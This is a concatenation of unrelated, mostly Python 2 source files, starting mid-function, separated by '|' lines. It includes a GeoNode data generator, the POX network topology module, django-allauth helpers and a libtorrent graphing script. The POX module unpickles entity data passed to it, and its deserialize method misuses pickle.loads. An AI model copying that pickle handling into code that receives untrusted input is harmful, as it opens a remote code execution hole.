tc = TopicCategory.objects.all()[random_index]
resource.category = tc
resource.save()
def assign_keywords(resource):
""" Assigns up to 5 keywords to resource """
for i in range(0, randint(0, 5)):
resource.keywords.add('keyword_%s' % randint(0, n_keywords))
def assign_regions(resource):
""" Assign up to 5 regions to resource """
for i in range(0, randint(0, 5)):
random_index = randint(0, Region.objects.all().count() - 1)
region = Region.objects.all()[random_index]
resource.regions.add(region)
def create_users(n_users):
""" Create n users in the database """
for i in range(0, n_users):
user = Profile()
user.username = 'user_%s' % i
user.save()
def set_resource(resource):
""" Assign poc, metadata_author, category and regions to resource """
resource.poc = get_random_user()
resource.metadata_author = get_random_user()
assign_random_category(resource)
assign_regions(resource)
def create_document(number):
""" Creates a new document """
file_list = glob.glob('%s*.jpg' % doc_path)
random_index = randint(0, len(file_list) -1)
file_uri = file_list[random_index]
title = 'Document N. %s' % number
img_filename = '%s_img.jpg' % number
doc = Document(title=title, owner=get_random_user())
doc.save()
with open(file_uri, 'r') as f:
img_file = File(f)
doc.doc_file.save(img_filename, img_file, True)
assign_keywords(doc)
# regions
resource = doc.get_self_resource()
set_resource(resource)
def create_layer(number):
""" Creates a new layer """
file_list = glob.glob('%s*.shp' % shp_path)
random_index = randint(0, len(file_list) -1)
file_uri = file_list[random_index]
layer = file_upload(file_uri)
# keywords
assign_keywords(layer)
# other stuff
resource = layer.get_self_resource()
set_resource(resource)
doc_path = '/tmp/docs/'
shp_path = '/tmp/shp/'
n_users = 50
n_keywords = 100
n_layers = 500
n_docs = 500
Tag.objects.all().delete()
Profile.objects.exclude(username='admin').exclude(username='AnonymousUser').delete()
create_users(n_users)
Document.objects.all().delete()
for d in range(0, n_docs):
t = Timer(lambda: create_document(d))
print 'Document %s generated in: %s' % (d, t.timeit(number=1))
for layer in Layer.objects.all():
delete_layer.delay(object_id=layer.id)
for l in range(0, n_layers):
t = Timer(lambda: create_layer(l))
print 'Layer %s generated in: %s' % (l, t.timeit(number=1))
|
"""
The Topology module is the root of an object model composed of entities
like switches, hosts, links, etc. This object model is populated by other
modules. For example, openflow.topology populates the topology object
with OpenFlow switches.
Note that this means that you often want to invoke something like:
$ ./pox.py topology openflow.discovery openflow.topology
"""
from pox.lib.revent import *
from pox.core import core
from pox.lib.addresses import *
import traceback
import pickle
class EntityEvent (Event):
def __init__ (self, entity):
Event.__init__(self)
self.entity = entity
class EntityJoin (EntityEvent):
"""
An entity has been added.
Note that if there is a more specific join event defined for a particular
entity, (e.g., SwitchJoin), this event will not be fired.
TODO: or we could always raise EntityJoins along with SwitchJoins, which
seems more intuitive to me.
"""
pass
class EntityLeave (EntityEvent):
"""
An entity has been removed
Note that if there is a more specific leave event defined for a particular
entity, (e.g., SwitchLeave), this event will not be fired.
TODO: or we could always raise EntityLeaves along with SwitchLeaves, which
seems more intuitive to me.
"""
pass
class SwitchEvent (EntityEvent): pass
class SwitchJoin (SwitchEvent):
"""
As opposed to ConnectionUp, SwitchJoin occurs over large time scales
(e.g. an administrator physically moving a switch).
"""
def __init__ (self, switch):
SwitchEvent.__init__(self, switch)
self.switch = switch
class SwitchLeave (SwitchEvent):
"""
As opposed to ConnectionDown, SwitchLeave occurs over large time scales
(e.g. an administrator physically moving a switch).
"""
pass
class SwitchConnectionUp(SwitchEvent):
def __init__(self, switch, connection):
SwitchEvent.__init__(self, switch)
self.switch = switch
self.connection = connection
class SwitchConnectionDown(SwitchEvent): pass
class HostEvent (EntityEvent): pass
class HostJoin (HostEvent): pass
class HostLeave (HostEvent): pass
class Update (Event):
"""
Fired by Topology whenever anything has changed
"""
def __init__ (self, event=None):
Event.__init__(self)
self.event = event
class Entity (object):
"""
Note that the Entity class is intentionally simple; It only serves as a
convenient SuperClass type.
It's up to subclasses to implement specific functionality (e.g.
OpenFlow1.0 switch functionality). The purpose of this design decision
is to prevent protocol specific details from being leaked into this
module... but this design decision does /not/ imply that pox.toplogy
serves to define a generic interface to abstract entity types.
NOTE: /all/ subclasses must call this superconstructor, since
the unique self.id is field is used by Topology
"""
# This is a counter used so that we can get unique IDs for entities.
# Some entities don't need this because they have more meaningful
# identifiers.
_next_id = 101
_all_ids = set()
_tb = {}
def __init__ (self, id=None):
if id:
if id in Entity._all_ids:
print("".join(traceback.format_list(self._tb[id])))
raise Exception("ID %s already taken" % str(id))
else:
while Entity._next_id in Entity._all_ids:
Entity._next_id += 1
id = Entity._next_id
self._tb[id] = traceback.extract_stack()
Entity._all_ids.add(id)
self.id = id
def serialize(self):
return pickle.dumps(self, protocol = 0)
@classmethod
def deserialize(cls):
return pickle.loads(cls, protocol = 0)
class Host (Entity):
"""
A generic Host entity.
"""
def __init__(self,id=None):
Entity.__init__(self, id)
class Switch (Entity):
"""
Subclassed by protocol-specific switch classes,
e.g. pox.openflow.topology.OpenFlowSwitch
"""
def __init__(self, id=None):
# Switches often have something more meaningful to use as an ID
# (e.g., a DPID or MAC address), so they take it as a parameter.
Entity.__init__(self, id)
class Port (Entity):
def __init__ (self, num, hwAddr, name):
Entity.__init__(self)
self.number = num
self.hwAddr = EthAddr(hwAddr)
self.name = name
class Controller (Entity):
def __init__(self, name, handshake_complete=False):
self.id = name
# TODO: python aliases?
self.name = name
self.handshake_complete = handshake_complete
def handshake_completed(self):
self.handshake_complete = True
class Topology (EventMixin):
_eventMixin_events = [
SwitchJoin,
SwitchLeave,
HostJoin,
HostLeave,
EntityJoin,
EntityLeave,
Update
]
_core_name = "topology" # We want to be core.topology
def __init__ (self, name="topology"):
EventMixin.__init__(self)
self._entities = {}
self.name = name
self.log = core.getLogger(name)
# If a client registers a handler for these events after they have
# already occurred, we promise to re-issue them to the newly joined
# client.
self._event_promises = {
SwitchJoin : self._fulfill_SwitchJoin_promise
}
def getEntityByID (self, ID, fail=False):
"""
Raises an exception if fail is True and the entity doesn't exist
See also: The 'entity' property.
"""
if fail:
return self._entities[ID]
else:
return self._entities.get(ID, None)
def removeEntity (self, entity):
del self._entities[entity.id]
self.log.info(str(entity) + " left")
if isinstance(entity, Switch):
self.raiseEvent(SwitchLeave, entity)
elif isinstance(entity, Host):
self.raiseEvent(HostLeave, entity)
else:
self.raiseEvent(EntityLeave, entity)
def addEntity (self, entity):
""" Will raise an exception if entity.id already exists """
if entity.id in self._entities:
raise RuntimeError("Entity exists")
self._entities[entity.id] = entity
self.log.debug(str(entity) + " (id: " + str(entity.id) + ") joined")
if isinstance(entity, Switch):
self.raiseEvent(SwitchJoin, entity)
elif isinstance(entity, Host):
self.raiseEvent(HostJoin, entity)
else:
self.raiseEvent(EntityJoin, entity)
def getEntitiesOfType (self, t=Entity, subtypes=True):
if subtypes is False:
return [x for x in self._entities.itervalues() if type(x) is t]
else:
return [x for x in self._entities.itervalues() if isinstance(x, t)]
def addListener(self, eventType, handler, once=False, weak=False,
priority=None, byName=False):
"""
We interpose on EventMixin.addListener to check if the eventType is
in our promise list. If so, trigger the handler for all previously
triggered events.
"""
if eventType in self._event_promises:
self._event_promises[eventType](handler)
return EventMixin.addListener(self, eventType, handler, once=once,
weak=weak, priority=priority,
byName=byName)
def raiseEvent (self, event, *args, **kw):
"""
Whenever we raise any event, we also raise an Update, so we extend
the implementation in EventMixin.
"""
rv = EventMixin.raiseEvent(self, event, *args, **kw)
if type(event) is not Update:
EventMixin.raiseEvent(self, Update(event))
return rv
def serialize (self):
"""
Picklize our current entities.
Returns a hash: { id -> pickled entitiy }
"""
id2entity = {}
for id in self._entities:
entity = self._entities[id]
id2entity[id] = entity.serialize()
return id2entity
def deserializeAndMerge (self, id2entity):
"""
Given the output of topology.serialize(), deserialize each entity, and:
- insert a new Entry if it didn't already exist here, or
- update a pre-existing entry if it already existed
"""
for entity_id in id2entity.keys():
pickled_entity = id2entity[entity_id].encode('ascii', 'ignore')
entity = pickle.loads(pickled_entity)
entity.id = entity_id.encode('ascii', 'ignore')
try:
# Try to parse it as an int
entity.id = int(entity.id)
except ValueError:
pass
existing_entity = self.getEntityByID(entity.id)
if existing_entity:
self.log.debug("New metadata for %s: %s " % (str(existing_entity), str(entity)))
# TODO: define an Entity.merge method (need to do something about his update!)
else:
self.addEntity(entity)
def _fulfill_SwitchJoin_promise(self, handler):
""" Trigger the SwitchJoin handler for all pre-existing switches """
for switch in self.getEntitiesOfType(Switch, True):
handler(SwitchJoin(switch))
def __len__(self):
return len(self._entities)
def __str__(self):
# TODO: display me graphically
strings = []
strings.append("topology (%d total entities)" % len(self._entities))
for id,entity in self._entities.iteritems():
strings.append("%s %s" % (str(id), str(entity)))
return '\n'.join(strings)
|
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import ansible._vendor
from ansible.release import __version__, __author__
|
import base64
import re
import unicodedata
import json
from django.core.exceptions import ImproperlyConfigured
from django.core.validators import validate_email, ValidationError
from django.core import urlresolvers
from django.contrib.sites.models import Site
from django.db.models import FieldDoesNotExist
from django.db.models.fields import (DateTimeField, DateField,
EmailField, TimeField,
BinaryField)
from django.utils import six, dateparse
from django.utils.six.moves.urllib.parse import urlsplit
from django.core.serializers.json import DjangoJSONEncoder
try:
from django.utils.encoding import force_text, force_bytes
except ImportError:
from django.utils.encoding import force_unicode as force_text
try:
import importlib
except:
from django.utils import importlib
def _generate_unique_username_base(txts, regex=None):
username = None
regex = regex or '[^\w\s@+.-]'
for txt in txts:
if not txt:
continue
username = unicodedata.normalize('NFKD', force_text(txt))
username = username.encode('ascii', 'ignore').decode('ascii')
username = force_text(re.sub(regex, '', username).lower())
# Django allows for '@' in usernames in order to accomodate for
# project wanting to use e-mail for username. In allauth we don't
# use this, we already have a proper place for putting e-mail
# addresses (EmailAddress), so let's not use the full e-mail
# address and only take the part leading up to the '@'.
username = username.split('@')[0]
username = username.strip()
username = re.sub('\s+', '_', username)
if username:
break
return username or 'user'
def get_username_max_length():
from .account.app_settings import USER_MODEL_USERNAME_FIELD
if USER_MODEL_USERNAME_FIELD is not None:
User = get_user_model()
max_length = User._meta.get_field(USER_MODEL_USERNAME_FIELD).max_length
else:
max_length = 0
return max_length
def generate_unique_username(txts, regex=None):
from .account.app_settings import USER_MODEL_USERNAME_FIELD
username = _generate_unique_username_base(txts, regex)
User = get_user_model()
max_length = get_username_max_length()
i = 0
while True:
try:
if i:
pfx = str(i + 1)
else:
pfx = ''
ret = username[0:max_length - len(pfx)] + pfx
query = {USER_MODEL_USERNAME_FIELD + '__iexact': ret}
User.objects.get(**query)
i += 1
except User.DoesNotExist:
return ret
def valid_email_or_none(email):
ret = None
try:
if email:
validate_email(email)
if len(email) <= EmailField().max_length:
ret = email
except ValidationError:
pass
return ret
def email_address_exists(email, exclude_user=None):
from .account import app_settings as account_settings
from .account.models import EmailAddress
emailaddresses = EmailAddress.objects
if exclude_user:
emailaddresses = emailaddresses.exclude(user=exclude_user)
ret = emailaddresses.filter(email__iexact=email).exists()
if not ret:
email_field = account_settings.USER_MODEL_EMAIL_FIELD
if email_field:
users = get_user_model().objects
if exclude_user:
users = users.exclude(pk=exclude_user.pk)
ret = users.filter(**{email_field+'__iexact': email}).exists()
return ret
def import_attribute(path):
assert isinstance(path, six.string_types)
pkg, attr = path.rsplit('.', 1)
ret = getattr(importlib.import_module(pkg), attr)
return ret
def import_callable(path_or_callable):
if not hasattr(path_or_callable, '__call__'):
ret = import_attribute(path_or_callable)
else:
ret = path_or_callable
return ret
try:
from django.contrib.auth import get_user_model
except ImportError:
# To keep compatibility with Django 1.4
def get_user_model():
from . import app_settings
from django.db.models import get_model
try:
app_label, model_name = app_settings.USER_MODEL.split('.')
except ValueError:
raise ImproperlyConfigured("AUTH_USER_MODEL must be of the"
" form 'app_label.model_name'")
user_model = get_model(app_label, model_name)
if user_model is None:
raise ImproperlyConfigured("AUTH_USER_MODEL refers to model"
" '%s' that has not been installed"
% app_settings.USER_MODEL)
return user_model
def get_current_site(request=None):
"""Wrapper around ``Site.objects.get_current`` to handle ``Site`` lookups
by request in Django >= 1.8.
:param request: optional request object
:type request: :class:`django.http.HttpRequest`
"""
# >= django 1.8
if request and hasattr(Site.objects, '_get_site_by_request'):
site = Site.objects.get_current(request=request)
else:
site = Site.objects.get_current()
return site
def resolve_url(to):
"""
Subset of django.shortcuts.resolve_url (that one is 1.5+)
"""
try:
return urlresolvers.reverse(to)
except urlresolvers.NoReverseMatch:
# If this doesn't "feel" like a URL, re-raise.
if '/' not in to and '.' not in to:
raise
# Finally, fall back and assume it's a URL
return to
def serialize_instance(instance):
"""
Since Django 1.6 items added to the session are no longer pickled,
but JSON encoded by default. We are storing partially complete models
in the session (user, account, token, ...). We cannot use standard
Django serialization, as these are models are not "complete" yet.
Serialization will start complaining about missing relations et al.
"""
data = {}
for k, v in instance.__dict__.items():
if k.startswith('_') or callable(v):
continue
try:
if isinstance(instance._meta.get_field(k), BinaryField):
v = force_text(base64.b64encode(v))
except FieldDoesNotExist:
pass
data[k] = v
return json.loads(json.dumps(data, cls=DjangoJSONEncoder))
def deserialize_instance(model, data):
ret = model()
for k, v in data.items():
if v is not None:
try:
f = model._meta.get_field(k)
if isinstance(f, DateTimeField):
v = dateparse.parse_datetime(v)
elif isinstance(f, TimeField):
v = dateparse.parse_time(v)
elif isinstance(f, DateField):
v = dateparse.parse_date(v)
elif isinstance(f, BinaryField):
v = force_bytes(
base64.b64decode(
force_bytes(v)))
except FieldDoesNotExist:
pass
setattr(ret, k, v)
return ret
def set_form_field_order(form, fields_order):
if hasattr(form.fields, 'keyOrder'):
form.fields.keyOrder = fields_order
else:
# Python 2.7+
from collections import OrderedDict
assert isinstance(form.fields, OrderedDict)
form.fields = OrderedDict((f, form.fields[f])
for f in fields_order)
def build_absolute_uri(request, location, protocol=None):
"""request.build_absolute_uri() helper
Like request.build_absolute_uri, but gracefully handling
the case where request is None.
"""
from .account import app_settings as account_settings
if request is None:
site = get_current_site()
bits = urlsplit(location)
if not (bits.scheme and bits.netloc):
uri = '{proto}://{domain}{url}'.format(
proto=account_settings.DEFAULT_HTTP_PROTOCOL,
domain=site.domain,
url=location)
else:
uri = location
else:
uri = request.build_absolute_uri(location)
if protocol:
uri = protocol + ':' + uri.partition(':')[2]
return uri
def get_form_class(forms, form_id, default_form):
form_class = forms.get(form_id, default_form)
if isinstance(form_class, six.string_types):
form_class = import_attribute(form_class)
return form_class
def get_request_param(request, param, default=None):
return request.POST.get(param) or request.GET.get(param, default)
|
from . import mrp_production
|
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class World(Base):
__tablename__ = 'world'
id = Column(Integer, primary_key=True)
randomnumber = Column(Integer)
sa_worlds = World.__table__
class Fortune(Base):
__tablename__ = 'fortune'
id = Column(Integer, primary_key=True)
message = Column(String)
sa_fortunes = Fortune.__table__
|
from collections import namedtuple
name0 = "name"
name = name0
nt = namedtuple(name, ["x", "y"])
|
import os, sys, time, os
from multiprocessing.pool import ThreadPool
thread_pool = ThreadPool(4)
stat = open(sys.argv[1])
line = stat.readline()
while not 'second:' in line:
line = stat.readline()
keys = line.strip().split(':')[1:]
output_dir = 'session_stats_report'
line_graph = 0
histogram = 1
stacked = 2
graph_colors = []
pattern = [[0,0,1], [0,1,0], [1,0,0], [1,0,1], [0,1,1], [1,1,0]]
def process_color(c, op):
for i in range(3):
if op == 0:
c[i] = min(255, c[i] + 0xb0)
if op == 2:
c[i] = max(0, c[i] - 0x50)
return c
for i in range(0,len(pattern) * 3):
op = i / len(pattern)
c = list(pattern[i % len(pattern)])
for i in range(3): c[i] *= 0xff
c = process_color(c, op)
c = '#%02x%02x%02x' % (c[0], c[1], c[2])
graph_colors.append(c)
line_colors = list(graph_colors)
line_colors.reverse()
def plot_fun(script):
os.system('gnuplot "%s" 2>/dev/null' % script);
sys.stdout.write('.')
sys.stdout.flush()
def gen_report(name, unit, lines, short_unit, generation, log_file, type=line_graph):
try:
os.mkdir(output_dir)
except: pass
filename = os.path.join(output_dir, '%s_%04d.png' % (name, generation))
thumb = os.path.join(output_dir, '%s_%04d_thumb.png' % (name, generation))
# don't re-render a graph unless the logfile has changed
try:
dst1 = os.stat(filename)
dst2 = os.stat(thumb)
src = os.stat(log_file)
if dst1.st_mtime > src.st_mtime and dst2.st_mtime > src.st_mtime:
sys.stdout.write('.')
return None
except: pass
script = os.path.join(output_dir, '%s_%04d.gnuplot' % (name, generation))
out = open(script, 'wb')
print >>out, "set term png size 1200,700"
print >>out, 'set output "%s"' % filename
print >>out, 'set yrange [0:*]'
print >>out, "set tics nomirror"
print >>out, "set key box"
if type == histogram:
binwidth = 0.005;
print >>out, 'binwidth=%f' % binwidth
print >>out, 'set boxwidth binwidth'
print >>out, 'bin(x,width)=width*floor(x/width) + binwidth/2'
print >>out, 'set xrange [0:%f]' % (binwidth * 100)
print >>out, 'set xlabel "%s"' % unit
print >>out, 'set ylabel "number"'
k = lines[0]
try:
column = keys.index(k) + 2
except:
print '"%s" not found' % k
return
print >>out, 'plot "%s" using (bin($%d,binwidth)):(1.0) smooth freq with boxes' % (log_file, column)
print >>out, ''
print >>out, ''
print >>out, ''
elif type == stacked:
print >>out, 'set xrange [0:*]'
print >>out, 'set ylabel "%s"' % unit
print >>out, 'set xlabel "time (s)"'
print >>out, 'set format y "%%.1s%%c%s";' % short_unit
print >>out, 'set style fill solid 1.0 noborder'
print >>out, 'plot',
column = 2
first = True
prev = ''
graph = ''
plot_expression = ''
color = 0
for k in lines:
try:
column = keys.index(k) + 2
except:
print '"%s" not found' % k
continue;
if not first:
plot_expression = ', ' + plot_expression
graph += '+'
axis = 'x1y1'
graph += '$%d' % column
plot_expression = ' "%s" using 1:(%s) title "%s" axes %s with filledcurves y1=0 lc rgb "%s"' % (log_file, graph, k, axis, graph_colors[color % len(graph_colors)]) + plot_expression
first = False
color += 1
print >>out, plot_expression
else:
print >>out, 'set xrange [0:*]'
print >>out, 'set ylabel "%s"' % unit
print >>out, 'set xlabel "time (s)"'
print >>out, 'set format y "%%.1s%%c%s";' % short_unit
print >>out, 'plot',
column = 2
first = True
color = 0
for k in lines:
try:
column = keys.index(k) + 2
except:
print '"%s" not found' % k
continue;
if not first: print >>out, ', ',
axis = 'x1y1'
print >>out, ' "%s" using 1:%d title "%s" axes %s with steps lc rgb "%s"' % (log_file, column, k, axis, line_colors[color % len(line_colors)]),
first = False
color += 1
print >>out, ''
print >>out, 'set term png size 150,100'
print >>out, 'set output "%s"' % thumb
print >>out, 'set key off'
print >>out, 'unset tics'
print >>out, 'set format x ""'
print >>out, 'set format y ""'
print >>out, 'set xlabel ""'
print >>out, 'set ylabel ""'
print >>out, 'set y2label ""'
print >>out, 'set rmargin 0'
print >>out, 'set lmargin 0'
print >>out, 'set tmargin 0'
print >>out, 'set bmargin 0'
print >>out, "replot"
out.close()
return script
def gen_html(reports, generations):
file = open(os.path.join(output_dir, 'index.html'), 'w+')
css = '''img { margin: 0}
#head { display: block }
#graphs { white-space:nowrap; }
h1 { line-height: 1; display: inline }
h2 { line-height: 1; display: inline; font-size: 1em; font-weight: normal};'''
print >>file, '<html><head><style type="text/css">%s</style></head><body>' % css
for i in reports:
print >>file, '<div id="head"><h1>%s </h1><h2>%s</h2><div><div id="graphs">' % (i[0], i[3])
for g in generations:
print >>file, '<a href="%s_%04d.png"><img src="%s_%04d_thumb.png"></a>' % (i[0], g, i[0], g)
print >>file, '</div>'
print >>file, '</body></html>'
file.close()
reports = [
('torrents', 'num', '', 'number of torrents in different torrent states', ['downloading torrents', 'seeding torrents', \
'checking torrents', 'stopped torrents', 'upload-only torrents', 'error torrents', 'queued seed torrents', \
'queued download torrents'], stacked),
('torrents_want_peers', 'num', '', 'number of torrents that want more peers', ['torrents want more peers']),
('peers', 'num', '', 'num connected peers', ['peers', 'connecting peers', 'connection attempts', 'banned peers', 'total peers']),
('peers_max', 'num', '', 'num connected peers', ['peers', 'connecting peers', 'connection attempts', 'banned peers', 'max connections', 'total peers']),
('peer_churn', 'num', '', 'connecting and disconnecting peers', ['connecting peers', 'connection attempts']),
('peer_limits', 'num', '', 'number of connections per limit', ['average peers per limit']),
('connect_candidates', 'num', '', 'number of peers we know of that we can connect to', ['connect candidates']),
('peers_list_size', 'num', '', 'number of known peers (not necessarily connected)', ['num list peers']),
('overall_rates', 'rate', 'B/s', 'download and upload rates', ['uploaded bytes', 'downloaded bytes', 'upload rate', 'download rate', 'smooth upload rate', 'smooth download rate']),
('disk_write_queue', 'Bytes', 'B', 'bytes queued up by peers, to be written to disk', ['disk write queued bytes', 'disk queue limit', 'disk queue low watermark']),
('peers_requests', 'num', '', 'incoming piece request rate', ['piece requests', 'piece rejects', 'max piece requests', 'invalid piece requests', 'choked piece requests', 'cancelled piece requests']),
('peers_upload', 'num', '', 'number of peers by state wrt. uploading', ['peers up interested', 'peers up unchoked', 'peers up requests', 'peers disk-up', 'peers up send buffer', 'peers bw-up', 'max unchoked']),
('peers_download', 'num', '', 'number of peers by state wrt. downloading', ['peers down interesting', 'peers down unchoked', 'peers down requests', 'peers disk-down', 'peers bw-down','num end-game peers']),
('peer_errors', 'num', '', 'number of peers by error that disconnected them', ['error peers', 'peer disconnects', 'peers eof', 'peers connection reset', 'connect timeouts', 'uninteresting peers disconnect', 'banned for hash failure', 'no memory peer errors', 'too many peers', 'transport timeout peers', 'connection refused peers', 'connection aborted peers', 'permission denied peers', 'no buffer peers', 'host unreachable peers', 'broken pipe peers', 'address in use peers', 'access denied peers', 'invalid argument peers', 'operation aborted peers']),
('peer_errors_incoming', 'num', '', 'number of peers by incoming or outgoing connection', ['error incoming peers', 'error outgoing peers']),
('peer_errors_transport', 'num', '', 'number of peers by transport protocol', ['error tcp peers', 'error utp peers']),
('peer_errors_encryption', 'num', '', 'number of peers by encryption level', ['error encrypted peers', 'error rc4 peers', 'peer disconnects']),
('incoming requests', 'num', '', 'incoming 16kiB block requests', ['pending incoming block requests', 'average pending incoming block requests']),
('waste', '% of all downloaded bytes', '%%', 'proportion of all downloaded bytes that were wasted', ['% failed payload bytes', '% wasted payload bytes', '% protocol bytes'], stacked),
('waste by source', '% of all wasted bytes', '%%', 'what\' causing the waste', [ 'redundant timed-out', 'redundant cancelled', 'redundant unknown', 'redundant seed', 'redundant end-game', 'redundant closing'], stacked),
('average_disk_time_absolute', 'job time', 's', 'running averages of timings of disk operations', ['disk read time', 'disk write time', 'disk hash time', 'disk job time', 'disk sort time']),
('average_disk_queue_time', 'job queued time', 's', 'running averages of disk queue time', ['disk queue time', 'disk job time']),
('disk_time', '% of total disk job time', '%%', 'proportion of time spent by the disk thread', ['% read time', '% write time', '% hash time', '% sort time'], stacked),
('disk_cache_hits', 'blocks (16kiB)', '', '', ['disk block read', 'read cache hits', 'disk block written', 'disk read back']),
('disk_cache', 'blocks (16kiB)', '', 'disk cache size and usage', ['disk buffer allocations', 'read disk cache size', 'disk cache size', 'cache size']),
('disk_readback', '% of written blocks', '%%', 'portion of written blocks that had to be read back for hash verification', ['% read back']),
('disk_queue', 'number of queued disk jobs', '', 'queued disk jobs', ['disk queue size', 'disk read queue size', 'read job queue size limit']),
('disk_iops', 'operations/s', '', 'number of disk operations per second', ['read ops/s', 'write ops/s', 'smooth read ops/s', 'smooth write ops/s']),
('disk pending reads', 'Bytes', '', 'number of bytes peers are waiting for to be read from the disk', ['pending reading bytes']),
('mixed mode', 'rate', 'B/s', 'rates by transport protocol', ['TCP up rate','TCP down rate','uTP up rate','uTP down rate','TCP up limit','TCP down limit']),
('connection_type', 'num', '', 'peers by transport protocol', ['utp peers','tcp peers']),
('uTP delay', 'buffering delay', 's', 'network delays measured by uTP', ['uTP peak send delay','uTP peak recv delay', 'uTP avg send delay', 'uTP avg recv delay']),
('uTP send delay histogram', 'buffering delay', 's', 'send delays measured by uTP', ['uTP avg send delay'], histogram),
('uTP recv delay histogram', 'buffering delay', 's', 'receive delays measured by uTP', ['uTP avg recv delay'], histogram),
('uTP stats', 'num', '', 'number of uTP sockets by state', ['uTP idle', 'uTP syn-sent', 'uTP connected', 'uTP fin-sent', 'uTP close-wait'], stacked),
('system memory', '', '', 'virtual memory page count', ['active resident pages', 'inactive resident pages', 'pinned resident pages', 'free pages'], stacked),
('memory paging', '', '', 'vm disk activity', ['pageins', 'pageouts']),
('page faults', '', '', '', ['page faults']),
('CPU usage', '%', '', '', ['network thread system time', 'network thread user+system time']),
('boost.asio messages', 'events/s', '', 'number of messages posted per second', [ \
'read_counter', 'write_counter', 'tick_counter', 'lsd_counter', \
'lsd_peer_counter', 'udp_counter', 'accept_counter', 'disk_queue_counter', \
'disk_read_counter', 'disk_write_counter'], stacked),
('send_buffer_sizes', 'num', '', '', ['up 8', 'up 16', 'up 32', 'up 64', 'up 128', 'up 256', \
'up 512', 'up 1024', 'up 2048', 'up 4096', 'up 8192', 'up 16384', 'up 32768', 'up 65536', \
'up 131072', 'up 262144'], stacked),
('recv_buffer_sizes', 'num', '', '', ['down 8', 'down 16', 'down 32', 'down 64', 'down 128', \
'down 256', 'down 512', 'down 1024', 'down 2048', 'down 4096', 'down 8192', 'down 16384', \
'down 32768', 'down 65536', 'down 131072', 'down 262144'], stacked),
('tick_rate', 'time between ticks', 's', '', ['tick interval', 'tick residual']),
('peer_dl_rates', 'num', '', 'peers split into download rate buckets', ['peers down 0', 'peers down 0-2', 'peers down 2-5', 'peers down 5-10', 'peers down 50-100', 'peers down 100-'], stacked),
('peer_dl_rates2', 'num', '', 'peers split into download rate buckets (only downloading peers)', ['peers down 0-2', 'peers down 2-5', 'peers down 5-10', 'peers down 50-100', 'peers down 100-'], stacked),
('peer_ul_rates', 'num', '', 'peers split into upload rate buckets', ['peers up 0', 'peers up 0-2', 'peers up 2-5', 'peers up 5-10', 'peers up 50-100', 'peers up 100-'], stacked),
('peer_ul_rates2', 'num', '', 'peers split into upload rate buckets (only uploading peers)', ['peers up 0-2', 'peers up 2-5', 'peers up 5-10', 'peers up 50-100', 'peers up 100-'], stacked),
('piece_picker_end_game', 'blocks', '', '', ['end game piece picker blocks', 'piece picker blocks', \
'piece picks', 'reject piece picks', 'unchoke piece picks', 'incoming redundant piece picks', \
'incoming piece picks', 'end game piece picks', 'snubbed piece picks'], stacked),
('piece_picker', 'blocks', '', '', ['piece picks', 'reject piece picks', 'unchoke piece picks', 'incoming redundant piece picks', 'incoming piece picks', 'end game piece picks', 'snubbed piece picks'], stacked),
]
print 'generating graphs'
log_file_path, log_file = os.path.split(sys.argv[1])
log_file_list = log_file.split('.')
g = int(log_file_list[1])
generations = []
scripts = []
while os.path.exists(os.path.join(log_file_path, log_file)):
print '[%s] %04d\r[' % (' ' * len(reports), g),
for i in reports:
type = line_graph
try: type = i[5]
except: pass
script = gen_report(i[0], i[1], i[4], i[2], g, os.path.join(log_file_path, log_file), type)
if script != None: scripts.append(script)
generations.append(g)
g += 1
log_file_list[1] = '%04d' % g
log_file = '.'.join(log_file_list)
# run gnuplot on all scripts, in parallel
thread_pool.map(plot_fun, scripts)
print '\ngenerating html'
gen_html(reports, generations)
|
nplurals=3 # Czech language has 3 forms:
# 1 singular and 2 plurals
get_plural_id = lambda n: ( 0 if n==1 else
1 if 2<=n<=4 else
2 )
|
from __future__ import with_statement
__author__ = 'rafek@google.com (Rafe Kaplan)'
import logging
from . import descriptor
from . import generate
from . import messages
from . import util
__all__ = ['format_proto_file']
@util.positional(2)
def format_proto_file(file_descriptor, output, indent_space=2):
out = generate.IndentWriter(output, indent_space=indent_space)
if file_descriptor.package:
out << 'package %s;' % file_descriptor.package
def write_enums(enum_descriptors):
"""Write nested and non-nested Enum types.
Args:
enum_descriptors: List of EnumDescriptor objects from which to generate
enums.
"""
# Write enums.
for enum in enum_descriptors or []:
out << ''
out << ''
out << 'enum %s {' % enum.name
out << ''
with out.indent():
if enum.values:
for enum_value in enum.values:
out << '%s = %s;' % (enum_value.name, enum_value.number)
out << '}'
write_enums(file_descriptor.enum_types)
def write_fields(field_descriptors):
"""Write fields for Message types.
Args:
field_descriptors: List of FieldDescriptor objects from which to generate
fields.
"""
for field in field_descriptors or []:
default_format = ''
if field.default_value is not None:
if field.label == descriptor.FieldDescriptor.Label.REPEATED:
logging.warning('Default value for repeated field %s is not being '
'written to proto file' % field.name)
else:
# Convert default value to string.
if field.variant == messages.Variant.MESSAGE:
logging.warning(
'Message field %s should not have default values' % field.name)
default = None
elif field.variant == messages.Variant.STRING:
default = repr(field.default_value.encode('utf-8'))
elif field.variant == messages.Variant.BYTES:
default = repr(field.default_value)
else:
default = str(field.default_value)
if default is not None:
default_format = ' [default=%s]' % default
if field.variant in (messages.Variant.MESSAGE, messages.Variant.ENUM):
field_type = field.type_name
else:
field_type = str(field.variant).lower()
out << '%s %s %s = %s%s;' % (str(field.label).lower(),
field_type,
field.name,
field.number,
default_format)
def write_messages(message_descriptors):
"""Write nested and non-nested Message types.
Args:
message_descriptors: List of MessageDescriptor objects from which to
generate messages.
"""
for message in message_descriptors or []:
out << ''
out << ''
out << 'message %s {' % message.name
with out.indent():
if message.enum_types:
write_enums(message.enum_types)
if message.message_types:
write_messages(message.message_types)
if message.fields:
write_fields(message.fields)
out << '}'
write_messages(file_descriptor.message_types)
|
"""
hyper/common/decoder
~~~~~~~~~~~~~~~~~~~~
Contains hyper's code for handling compressed bodies.
"""
import zlib
class DeflateDecoder(object):
"""
This is a decoding object that wraps ``zlib`` and is used for decoding
deflated content.
This rationale for the existence of this object is pretty unpleasant.
The HTTP RFC specifies that 'deflate' is a valid content encoding. However,
the spec _meant_ the zlib encoding form. Unfortunately, people who didn't
read the RFC very carefully actually implemented a different form of
'deflate'. Insanely, ``zlib`` handles them using two wbits values. This is
such a mess it's hard to adequately articulate.
This class was lovingly borrowed from the excellent urllib3 library under
license: see NOTICES. If you ever see @shazow, you should probably buy him
a drink or something.
"""
def __init__(self):
self._first_try = True
self._data = b''
